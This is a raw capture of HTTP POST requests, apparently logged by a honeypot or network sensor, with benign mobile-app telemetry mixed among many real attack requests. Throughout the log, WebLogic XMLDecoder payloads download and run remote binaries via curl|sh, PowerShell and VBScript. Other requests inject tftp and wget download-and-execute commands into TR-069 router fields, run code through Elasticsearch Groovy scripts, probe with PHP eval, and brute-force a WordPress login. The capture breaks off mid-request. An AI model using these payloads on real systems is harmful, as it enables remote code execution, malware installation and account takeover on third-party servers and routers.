POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13
key=KJDF403KJ
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
axa=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://cm.gcm.ksmobile.com/rpc/gcm/report HTTP/1.1
Charset: UTF-8
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: cm.gcm.ksmobile.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 428
appflag=khcleanmaster&phonelanguage=in_ID&cmlanguage=in_ID&mcc=510&mnc=10&apkversion=5.14.2.4845&dataversion=2016.7.18.1648&sdkversion=4.4.4&manufacture=Xiaomi&channel=2010002546&trdmarket=1&cl=ID_in&aid=6ccc52a8048214f&timezone=Asia/Jakarta&country=ID&enabled=1&regid=APA91bGWRkNgry8cYyTFS3g5eIn45GwRPU2cMOutNLOJrtD0cDMgD-8kcgnif0oOZW-t9q0dLL3vE7GzHPq5J5vYHNKaQ67rDQ7Lzjmi1JJq5ZsNLMAOa-qBawNqE96V5Lk29ZQUmowh&regtime=1493631697
POST http://check.proxyradar.com/azenv.php?auth=152931069039&a=PSCMN&i=3489034269&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 432
Cache-Control: no-cache
E/QPyNrBbBp3QvrgAZuOnhadc1Izn+ru31TLLgkc3qozNi0dkxR+Q9UibdY2K9jig6S43DzAXXYl0HtybtrzZmghDYf5gVpQ3n/IcjJdntAhP9DC52ynvIfMGX0I4lRkuLtFLzPCoi4t6lQF9q3UTP4ZrxwG48kSMT1zF0G3tb4oMMdVL51d0JFoynS3l841AMvBbzVc1C5jcq1/jNW/90XPtFqtjEgh+KYv004/WDdRFEb3ycaJ7yXO9LsXOsZmxxDg/dK8G9vy9+GoBOBrgveRJ6jTOKrlrqnxQsbUosra8uhHA2QVN26aDaFo7hFRtVh8dAIKb8eY6Lml2jxxkEUn5rHYUNqCuXZFJaoe6z2zIk/ZEOF6va8lxD7V6ZXlLQLXw73NARSHW/BD3X7jdWYmxKWZfcmXn2IWotB3pIOMvPtT
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache
R6VZlIiZNpe+i4WDjFd05FDNqcGm2p1lV4B9ypQahhnKEbHIcd3QQbKXwiZcyjisZG9W6qaYuRZKewkXdrgyfhhOHYO17TALNcuAlQzUyY31QpRpaud+4iUe2Rv0oFwo/Y+owp/c3LoKMpYChmNoahTMhoLxHZbqb/fkXmgFm75vOFbq1NIeY28jSBekAYn5vt6oORI5aGNzJ/3mHkb+KZktpz2cBBr8W7LKQjKpsoHnSzKALC/8cUXQhzobJClsYuCmxpFRDn5hmE6DE7EM9h+F8jWaqHsK4Jhhqpw4r2/SENBhMRU5W7RA13uJ6aOw4UG8W1zg2Xw6WVLCaxYt0PqypSiqgtmw2cuGVzt953EaNbrS
POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked
3f9
òã…Ω¢w€|`9dAVp
Mo)M\WRexTP$fnax]Huíbu(
aJL Zgj-: wR"5=dWHmS?\VMZ+jOXV[a~rTL[Z>'B6=[S TDBC
rAYQ^{k[jW[SAoy@\W\gg^VMZ>jONQ b|NbBZWjpD W2-TfQ]M9yDUAFu9
rV_S<|X2*hB[OlyGeWgBZ2jOUOH!k
`Q]PHmdW
HmkK]=

2!B9-A\7JLZgyC_S^ne
ArW_TJdzDYS^ay
dRVYT+WVASc+N 4T
VNd)B _f|6ET[XnzFYWH{kXj[M>}SX4( 3^ZM9pM]UZ2{MQbDM'WVRY{k^jU_XJi{YNus
Q?IH2'[ >%M3H  s)>-_1M
LMZ(jOXV_g{rWDTPIhzL^R_g}fRYU@edWAPuxQaS]TId.GYY1(Pa@VPN?z [Sdk \LTNhyA\UYny iVWXjzL\5q6E_[Cq3WAPfx&\ZPKdzF^[_{kX\rD
s/2gI\4V V<8M;<[|L[Lh|F]WFu:
aS\XJl}EXUZaqd^BCrWUW1pLb@QXXj-YR_bNSb_
RJn}ANOH'ke_V9- 1*TiFSPd}_ZR4~
rYJCrD@Ausb^^R@qjAPu*G_~C 8f8 L7ILMZ(jO]Q^bq|L[Il}GUQ[by`^ZV@mpYNHmk2B_
VJ9CU]2(ePJhq_QYb}
rTDTCj)_WRexTe@SXWd-ARayNgT^XZ dN HmxrRDTTNnyFTVY{kX\rD
s.8&C<M CT=WVWXb{#\_PMoqG]VZchQZY@qjNYH`~3@UXTA;)@
PS3+MVe[A9
29f
yF\R ue
BrDTAe-D_UZ4pPeESIk}FZYgzKT6TLT&jNYR{k^jV_SJozD@A9k3K @>- y&ZQ1JLZgqM^R_{k[jW[SAoy@\W\gg^VMZ>jONT]exKVcSWh.FU2-1WInxD
AFu9
rFVQ8+DS6{JcG_
RAd,\\g{
aBZ2jO^OH!khRBC3jON:gJP=JLZgpF@Ause_\PMm|C\URc~
hD
CB+C[P o(T`WT9+@SYa,M`R_8jYNHmk
fRd-U[^o*eRYWI?qC]U[1,
O|_DCBldWAPey`WXQHqjAPu*G_~IV<&>*[|L[HqjNY[f| bS^UNm~MXT^e}3\LRIdyMXZ\fz3 9zM  axPfS
CT8WVA_c-J
b^XLo|
apN6F_]TH;)ATH*eS?\VMZ+jO]SRgx`DZgjD4%MS>I/f % \KrDCBn}AUS_be
ArW_TJdzDYS^ay
dRVYT+WVAbx2T\Tk+ Y1/M
c_^L>GYQH{kXjV]@iy^ d-NW5VWH?-F\SSf*J
`D<
0
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 530
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache
AQrjzCZDVwp3sYodql7DMEk1jR13ruI78HZ4uK1CHM+USLesqh49X+mKiae4OnuUaKmzMl4xhraFgFYwuEPgvqTQvqAksaJE5Z2W4Vp5sIHU7AMe+RRPYJUvhwHRGxIb7SL9wombeYnQz9S/XR/5y3Zn1bNL3z42PN1FlMN9sd0vYeSlDsHLIezpENbr5w2htl5JO2zFDZIcdTxnSXX1GNsKxRO2eYCjRvJzGzT09Eqj4ilp3mW52YnC7LkRHe4x3ErGBhIXKWGMFl5Wdd6cnn7S97a7bBGpVPa01oeMr8nN4l1b/+dk0e4M1Puk3HosOJ/xPRKBscfyNWYYU8ZVqBHSWk90+JgCrPr7zmAKz+3yQJRWHpv8bwH0UxLKPWIm9BJORvKMYHweJwcI7u/708Dc1mI/8lWS+w0cVA==
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ål÷yyÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îìD!Y›∆√«∆fl
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149602540431&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue321
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 32
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue9
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 519
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://tr069.pw/1;chmod 777 1;./1`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
‡rmqv
wf
C
POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://admaster.union.ucweb.com/usetting/v1/fetch_config HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: admaster.union.ucweb.com
Content-Type: application/json; charset=utf-8
Content-Length: 259
{"vno":"1495194020093","configs":[{"anchor":"0","name":"app_data"}],"app_id":"5e9abf4638d337bb55007d1fd4244486","chk":"0efb8a6c","info":{"sdk_ve":"3.0.10","pkg_ve":"10.9.0","pkg":"com.uc.browser.en","type":"1","device_hash":"af8795dc3d31775f","sdk_vc":"212"}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1072
Content-Type: multipart/form-data; boundary=nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
47785
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1a62aba177bcf4d483b4de94e2ead21a
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb--
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1025
Content-Type: multipart/form-data; boundary=g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
274376
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
f1785b92f1f119e5123ff476bb564f05
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI--
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 24
Cache-Control: no-cache
log=jamesatchue&pwd=aaaa
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
h=die((string)(111111111*9));
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
m=die('Hello, Peppa!'.(string)(111111111*9))
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 33
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue99
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache
SvFfld3LMAcb7s6eiGwhO95VJEm2TOGnKtnY6Sc3R6B+/rHlMsKqTXJ4u3VuVQq4HmGrPVLKOZZt8HXxG+E0k1qCf11BQITrQFHbpqACLe/14LHE9RViPGTl3Mky91WTUYH73hPD2yXVqvHZCMX9DGl9/003Qnc0yqklmSymx7WaPRqBwu5rJ1y5wrG2ON6X9SLN95KIXIonVSmLsizusdQetPRRMRRWK+IUmQtDcikVPvDxdD7PCVqzIgB63ndSkUJSjM6Nzsg2MTL84FN+8Z9L9YZwIl7RhGM+wu5zdgxjNnQhU/2Ms0O6jrp5MOw14IhC3PrjruUeQsI0TV9xwNcoPShrnPEkHR7vfq6bSlrOx/IR
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache
S/Fcl9LKYA8DrdXmMonzIIz+2rxcpsS4LeIlWhtMsbG55xyC+UdTXqzJ7t8Mwg0IVCCezJzo3RnSpZwlyJkMiBtZ5uSH9kiYrWJL10yRUZgdeBOY56KfIteQbzC5BYw8ivTf6yCs8QM1XUE1T0xxUI4pPsb35USYfCvd2M3uLBj7gPhGiX5YSywDHhj2ulxzbpnMl0wba8bjuAox2CtjLq7vdsqPEhfpTRH+LjKrex1Xc6B+QxlJAxye5mgSCWrpX3wL29hEdRmLw783WzCsUwvN3XAIP0h+x3O4slB/Sl+17KLhNSsGiHTUXf4w3rKTSNh83kOrr41XBxiKWlnHlhTqrivt1enovBgPW5LaDmzoodSwGdJsuZL6XOhnTxHmWdw1KfpTtvu6xuYcfFSkrPJMWQ==
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
